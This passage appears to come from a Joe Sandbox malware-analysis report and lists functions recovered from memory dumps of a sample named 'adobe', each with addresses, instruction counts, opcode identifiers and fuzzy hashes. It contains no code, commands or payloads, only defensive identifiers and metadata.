                                                  • Opcode Fuzzy Hash: a9d5d5814fe77f1583dcd9c67de5bc69789210d9d8f575a242bf2b9a57b24072
                                                  • Instruction Fuzzy Hash: 9061CF71F000114FDB54AA6EC88066FBADBAFD4220F654479E80EDB364DEA9DD0287D2
                                                  Function 067542E2 Relevance: .2, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c45dab12284ed5c2c14e92da0cc3fbccebf32c9ba17679ff42f77fac34b4cadf
                                                  • Instruction ID: a95b68431e8b85b01e4b0ea81ffd10db435bb6ea21bb2ad70b57f0b50eb73cdd
                                                  • Opcode Fuzzy Hash: c45dab12284ed5c2c14e92da0cc3fbccebf32c9ba17679ff42f77fac34b4cadf
                                                  • Instruction Fuzzy Hash: B2815030B006098FDB44DFB5D8546AE77F2EF85304F118568D80AEB359EB75DC868792
                                                  Function 06754600 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1181cf974bc0c2a58e86f1e8ca66ec6c321ebe67a0af736f2024fd12ba4759b1
                                                  • Instruction ID: 947b75616bbd9d6774ccb4c61133bb170c15b1002719b9ea60de980a10950ffc
                                                  • Opcode Fuzzy Hash: 1181cf974bc0c2a58e86f1e8ca66ec6c321ebe67a0af736f2024fd12ba4759b1
                                                  • Instruction Fuzzy Hash: 2A914E30E106598FDF60DF64C890B9DB7B1FF85300F218595D449BB295DB70AA85CB91
                                                  Function 06754618 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e94ba3362dfdd355a284e6bb995fb843c1f262f8feba872a336d26edff21dd00
                                                  • Instruction ID: 473ca0399f4a474cf2e8066c4961bf0ec5a896220ba863234328d7f1f6064fb1
                                                  • Opcode Fuzzy Hash: e94ba3362dfdd355a284e6bb995fb843c1f262f8feba872a336d26edff21dd00
                                                  • Instruction Fuzzy Hash: D2913D30E106198BDF60DF68C890B9DB7B1FF89304F208599D549BB255EB70AA85CF91
                                                  Function 0675EF78 Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2741f4fe2329e34a342ab5a8d6ff69fdb42d967da8fb94a95fadf85b21a63ff6
                                                  • Instruction ID: 104786d1cbf8c860fbcffce80fc8e6b5a43c29b01e003a0265267b38420678c0
                                                  • Opcode Fuzzy Hash: 2741f4fe2329e34a342ab5a8d6ff69fdb42d967da8fb94a95fadf85b21a63ff6
                                                  • Instruction Fuzzy Hash: CC716B70A002099FDB44DFA8D990AAEBBF6FF88300F258469E405EB355DB74ED46CB50
                                                  Function 0675EF88 Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59a16abb08a3cff75d88876c73abf6f1b212c99aad673d1d0fa7cd1871ff3ac1
                                                  • Instruction ID: 5842ef64118cf22f24a39782173ca8467cd1925e3465db750d4f95de15892b5f
                                                  • Opcode Fuzzy Hash: 59a16abb08a3cff75d88876c73abf6f1b212c99aad673d1d0fa7cd1871ff3ac1
                                                  • Instruction Fuzzy Hash: A3716C70A002099FDB54DFA8D990AAEBBF6FF84300F158469E405EB355DB74ED46CB50
                                                  Function 0675FC11 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc8175305e9b7b44f801ceca0845b50e8fbccb1d815d50cb1d074fa318ce18d1
                                                  • Instruction ID: 6fb5398f3fa624fd47307ad81e89f7465a8cb34d3edf2b33578f0563edd17f14
                                                  • Opcode Fuzzy Hash: dc8175305e9b7b44f801ceca0845b50e8fbccb1d815d50cb1d074fa318ce18d1
                                                  • Instruction Fuzzy Hash: BC510231E00209DFDF54EB78E4946ADBBB2FF84315F2188BAD90AD7250CB799905CB80
                                                  Function 0675F9C1 Relevance: .2, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74c06a6a65dfde52e361b80c531054a15f1bac120cc9c727e1b3b3852de8792e
                                                  • Instruction ID: 5e635603ebe3b41b7645c8c69ae97c63713ede2a90863b85829d6f984f2cdffa
                                                  • Opcode Fuzzy Hash: 74c06a6a65dfde52e361b80c531054a15f1bac120cc9c727e1b3b3852de8792e
                                                  • Instruction Fuzzy Hash: C651D670B10204DFEF65677DE99473F265EDB89300F25486AE80AC3399CAADCC458BD2
                                                  Function 0675F9D0 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2bc9e94e054e314296dd3ee846c41b5121988471a7509a90d216413cfd442e9
                                                  • Instruction ID: 40e3bd6c5b472967fabeb4d6c2bb5d5aded923d959dc64fdb0ffafc34c064fac
                                                  • Opcode Fuzzy Hash: e2bc9e94e054e314296dd3ee846c41b5121988471a7509a90d216413cfd442e9
                                                  • Instruction Fuzzy Hash: 4551C670B10204DFEF64676DE95473F265ED789310F25486AE80AC3399CAADCC458B92
                                                  Function 067555D8 Relevance: .1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c96b38df7b481d2361308f410b11c313a34164eabc54baac16737fb4b303fba
                                                  • Instruction ID: eb4a3460d247a4acfc29f15bc0bbe39e1062cf14d60b6e606cec9c6d0abb56a1
                                                  • Opcode Fuzzy Hash: 1c96b38df7b481d2361308f410b11c313a34164eabc54baac16737fb4b303fba
                                                  • Instruction Fuzzy Hash: 6651A474E002458FFF718B69C4C077EBBB2EB45310F26C8A9E959DB281D6B5D881CB91
                                                  Function 0675545A Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7b25ee25a08d36a49e0385d0712c908b1e11139ff7926b93c2b047b747131d4
                                                  • Instruction ID: a395150d8e6325e4f06fdf093d7d1daa231d1da0f02ebe649492a92e90257bc3
                                                  • Opcode Fuzzy Hash: a7b25ee25a08d36a49e0385d0712c908b1e11139ff7926b93c2b047b747131d4
                                                  • Instruction Fuzzy Hash: 0E419D31E002098FEF70CEA9D8C0ABFF7B2EB84310F10496AE616D7610D371E8858B91
                                                  Function 067520B0 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0cee8a9265a7da3371355ea1e63bfb142384fe00917586059cc436895139fdbb
                                                  • Instruction ID: d15a35f32dba7752dd4b8c271ede8184c4faf46ac526ba008540c82b34c4602b
                                                  • Opcode Fuzzy Hash: 0cee8a9265a7da3371355ea1e63bfb142384fe00917586059cc436895139fdbb
                                                  • Instruction Fuzzy Hash: 7A31B230E506099FDB09CF64D85469EB7B2EF8A300F108559EC19EB351DB70ED42CB90
                                                  Function 0675D9C8 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d3006565c011223c8d28c1b6d491078cff712a3c3982eb4fd890a3213b449c1
                                                  • Instruction ID: b5088ea2be9c6161d39b5bcce1ca27b788a2d5f2547ade34e7f8927fae30d6b2
                                                  • Opcode Fuzzy Hash: 2d3006565c011223c8d28c1b6d491078cff712a3c3982eb4fd890a3213b449c1
                                                  • Instruction Fuzzy Hash: AD31E430E1060A8BDB64DF69D890A9FB7B6FF85304F118569E805EB244DBB0E946CB85
                                                  Function 067520C0 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0da0cf6dca77dd35559583cbac8ca55929a9732e3642b36260ea7879f02730df
                                                  • Instruction ID: d4bca36562567dbf6a59979c442b1076dcd60fb608bf38e67234c9efd35e87a8
                                                  • Opcode Fuzzy Hash: 0da0cf6dca77dd35559583cbac8ca55929a9732e3642b36260ea7879f02730df
                                                  • Instruction Fuzzy Hash: D5316D30E106099BDB58CF65D8946AFB7B2EF8A300F118569EC19E7351DB71ED42CB90
                                                  Function 06753EE9 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5748287fbf9a1e82677dfab827ebed5757b64f8a24d8f1fee1563d094e408acc
                                                  • Instruction ID: 736d02fc2e7fc0e0bf700a10cc1a7070784d5d4541e59ced539331afdd399999
                                                  • Opcode Fuzzy Hash: 5748287fbf9a1e82677dfab827ebed5757b64f8a24d8f1fee1563d094e408acc
                                                  • Instruction Fuzzy Hash: 67218B75F006059FDB50DFA8D880AAEBBF1EF88210F158169E919E7390E775D9018F91
                                                  Function 06753EF8 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 635c25cdf9d0248b26b4208c8e2840eeb3ed82254074dc42f7f9295c23cd4c21
                                                  • Instruction ID: 744e915fee4cf3aec170fd2174d622b0710964d00b7b30cf98050b665ee8086e
                                                  • Opcode Fuzzy Hash: 635c25cdf9d0248b26b4208c8e2840eeb3ed82254074dc42f7f9295c23cd4c21
                                                  • Instruction Fuzzy Hash: 92219C71E006059FDB50DFA8D880AAEB7F1EB48350F1081A5E905E7390E771D9018F91
                                                  Function 00DBD030 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485427779.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_dbd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a214d0a5b6c59d5740c7df3c61f4e91ffdc9564884b717e690147d536b70374
                                                  • Instruction ID: 6b3023a7d4501062919042289b795a09f798026367b79dcfd35ad41c63331e7f
                                                  • Opcode Fuzzy Hash: 8a214d0a5b6c59d5740c7df3c61f4e91ffdc9564884b717e690147d536b70374
                                                  • Instruction Fuzzy Hash: 4221FF71604204DFCB14EF24D9C0B66BBA6FB88314F24C56DE94A4B296D33AD846CB72
                                                  Function 00DBD005 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485427779.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_dbd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d364af46f53de8b72b002b2d4684eec6369d257a0e8e34b5108047354f68478
                                                  • Instruction ID: 93b858a6319c792474c3380046a0c4c25ab1c35e8a8c026d309ba079dfa11833
                                                  • Opcode Fuzzy Hash: 7d364af46f53de8b72b002b2d4684eec6369d257a0e8e34b5108047354f68478
                                                  • Instruction Fuzzy Hash: C7214B715093C09FCB03DB24D994711BF71AB46214F29C5DBD8898F2A7D23A980ACB62
                                                  Function 06754008 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 085451887281a389c735b8af1828e72a4fc5a20f4457ecd4ea8d71fcf4424945
                                                  • Instruction ID: d0d7a8f3762d0546196b3e8a178acc7d2d506fb04b70f126ade175804a630c1d
                                                  • Opcode Fuzzy Hash: 085451887281a389c735b8af1828e72a4fc5a20f4457ecd4ea8d71fcf4424945
                                                  • Instruction Fuzzy Hash: 9211A532B101284FDB549668D8146AE73F6EBC8311F1185BAC80AE7344EEA6DC0287D2
                                                  Function 06754240 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bed5fed2489ec3d3540de7837e56cdfca25bf13f95ff862744bf20d9a1d9e3c2
                                                  • Instruction ID: 8e10be86f23460f43eccd76adf381566b6d432e504fe21d3ea9c66663b487f2f
                                                  • Opcode Fuzzy Hash: bed5fed2489ec3d3540de7837e56cdfca25bf13f95ff862744bf20d9a1d9e3c2
                                                  • Instruction Fuzzy Hash: DA01D432B000251BEB64D6AED864BABB2CADBCA714F11843AF50EC7348EDA5DC4243D5
                                                  Function 06753CC0 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ae1077276548bcbf07febec097ae058744024f0c97e94100583329237322911
                                                  • Instruction ID: 7fc486ca7697198beb73492ee6df5e1d6f39bc31c798cc340bc8466a452c5fd5
                                                  • Opcode Fuzzy Hash: 8ae1077276548bcbf07febec097ae058744024f0c97e94100583329237322911
                                                  • Instruction Fuzzy Hash: 412103B1D01219AFCB00DF9AD884ADEFFB8FB48310F10816AE918A7310D3746954CFA5
                                                  Function 0675F1F8 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29c6848c0a093cfb4d91f9fa4057615b27b072e5777a5bd1fed8a79eb2a8fc6f
                                                  • Instruction ID: 8ae01b9f2f0f55e4f85794d1a0587d5648a9c58cdf23bad281c481cccea99476
                                                  • Opcode Fuzzy Hash: 29c6848c0a093cfb4d91f9fa4057615b27b072e5777a5bd1fed8a79eb2a8fc6f
                                                  • Instruction Fuzzy Hash: C201F135B041410FEB61D6BD9854B2F7BDACBCB624F0688AAE409C7391DA58DC0347D6
                                                  Function 0675A350 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1433734f3f1dae68b3e5eb9c2af7579fb26b2520f5dc72a3e93bde7dd96cdd
                                                  • Instruction ID: 0fe28665d8cfd4ee3c87964572dc7f1868889f8104b825017750989a387bd915
                                                  • Opcode Fuzzy Hash: ce1433734f3f1dae68b3e5eb9c2af7579fb26b2520f5dc72a3e93bde7dd96cdd
                                                  • Instruction Fuzzy Hash: 9901DF31B101144FEB50DA38E890B6B73D6EB86618F114678F40AC7340E962EC0283D0
                                                  Function 06753FF9 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49bfdc891882f5e527716cc8e2ae78dd70c9f71728eb36acb6b29dc50d66395a
                                                  • Instruction ID: 86a7a84d01e0d6f9006d04955ffae19adc276901a70ab5b71eaee638cd6a5946
                                                  • Opcode Fuzzy Hash: 49bfdc891882f5e527716cc8e2ae78dd70c9f71728eb36acb6b29dc50d66395a
                                                  • Instruction Fuzzy Hash: D901F733B100281BEB549668DC147FF32EAEBC9310F1241B6D50AE3384EEA6CC0247D2
                                                  Function 06753CC8 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b14c4e92cfa633bb4a9f3a1e6fbb84a9ec5a9a4f7cb201b11b112b6fd0a57fe6
                                                  • Instruction ID: a9c0d8e53950cc1ea2b5316111960c75654e39716e334d24eae82213b3b3eefc
                                                  • Opcode Fuzzy Hash: b14c4e92cfa633bb4a9f3a1e6fbb84a9ec5a9a4f7cb201b11b112b6fd0a57fe6
                                                  • Instruction Fuzzy Hash: 2D11D3B1D012599FCB00DF9AD884ADEFBB8FB49310F10816AE918A7210D3746954CFA5
                                                  Function 06754250 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 538338d4a85a6274c46a48f34a4c5f2a84641412887ab1adf0b0c35477f7205e
                                                  • Instruction ID: ee9342389f45689aa8080ed2aa84632839c4644eb6bcacf9e10d5144c792f376
                                                  • Opcode Fuzzy Hash: 538338d4a85a6274c46a48f34a4c5f2a84641412887ab1adf0b0c35477f7205e
                                                  • Instruction Fuzzy Hash: 6E01D132B000250BDB64D6AED454B6BB6DBDBCA721F11843AE90EC7388EEA5DC4243D5
                                                  Function 0675F208 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c19604921f1eccee5e5dd39c3a80d2a8ab9edceb7ed857a6f9187fbde8fb3df
                                                  • Instruction ID: eb90ce0b63fc544d448dd4c7c99283d89fb325eea8c27e8d0652a3de1578d260
                                                  • Opcode Fuzzy Hash: 4c19604921f1eccee5e5dd39c3a80d2a8ab9edceb7ed857a6f9187fbde8fb3df
                                                  • Instruction Fuzzy Hash: DC01D175F000140BDB65D6ADA854B3F76CACBCA624F11887AF50AC7350DE69DC034BD5
                                                  Function 0675A360 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a2b658f5b923aa1f8088e286d1f2a65d38ddbfed07ccdf03ca0d1bdbea15f87
                                                  • Instruction ID: 3ee392fceb7fd76135f8970716b8da5835f2fef8cf2c8066505affb6419b820a
                                                  • Opcode Fuzzy Hash: 5a2b658f5b923aa1f8088e286d1f2a65d38ddbfed07ccdf03ca0d1bdbea15f87
                                                  • Instruction Fuzzy Hash: E801D131B105144FDB50EA38E850B2F77D6EB8A718F118678E50AC7344EEA2EC0283C0
                                                  Function 0675C830 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525216eeeac5cfc2bf5efb55b2b17a322a7f487deddb0ba2ef98b4d3affa8566
                                                  • Instruction ID: 6162cfe03a4090a5f62ed951c8e634cc7fb6320c871f34091dddb0fb34305731
                                                  • Opcode Fuzzy Hash: 525216eeeac5cfc2bf5efb55b2b17a322a7f487deddb0ba2ef98b4d3affa8566
                                                  • Instruction Fuzzy Hash: 57F0A032E212689BDB559A76EC00AABB779E784354F1144AAED01F7244DA72A801CBD0
                                                  Function 067564B8 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 98c0091b8d38cc2d137d3a3d9e4dbadae2f39c3c3320ee450c1a699a72546bdb
                                                  • Instruction ID: 6c75f71f1255778c23f0c168230ebf88f31faefad1fbfc7d28956862fe6f32bd
                                                  • Opcode Fuzzy Hash: 98c0091b8d38cc2d137d3a3d9e4dbadae2f39c3c3320ee450c1a699a72546bdb
                                                  • Instruction Fuzzy Hash: EEE0D871E181885BEF60CE70895935A7B78DB02204F2144E9DC08CB102E1B5CF028391

                                                  Non-executed Functions

                                                  Function 067576E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: 65c78b362728bad11f1d81832a3c87ec0e890780be09032caa3ee3af2236a763
                                                  • Instruction ID: bb522a1a8d7d032fa62253914f8ce772febf90ce367ea5be6b81eb4095514d43
                                                  • Opcode Fuzzy Hash: 65c78b362728bad11f1d81832a3c87ec0e890780be09032caa3ee3af2236a763
                                                  • Instruction Fuzzy Hash: EF123E30E002198FDB68DF69C894AADB7F6FF84304F2185A9D809AB355EB719D41CB81
                                                  Function 0675A980 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: 7bddcf3568229e4d72857f50affc0861c926832aaa0492e19f589b029b091605
                                                  • Instruction ID: 3c9091b083b28142679a2d281d74825dc746b43e042c98e30c6146ef78f40cea
                                                  • Opcode Fuzzy Hash: 7bddcf3568229e4d72857f50affc0861c926832aaa0492e19f589b029b091605
                                                  • Instruction Fuzzy Hash: 06915F30A00209DFEB68EF65D994B6E7BF6FF44300F1186B9E801A7295DBB59D41CB90
                                                  Function 067570E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 8543b0110ad27a74d9ceb4a168d19447bcc9ce43553e4694793d9cbfbd783609
                                                  • Instruction ID: a196b4160433b21611c2698887dc1f509e862ca5670350cd4f8caf262293c1ad
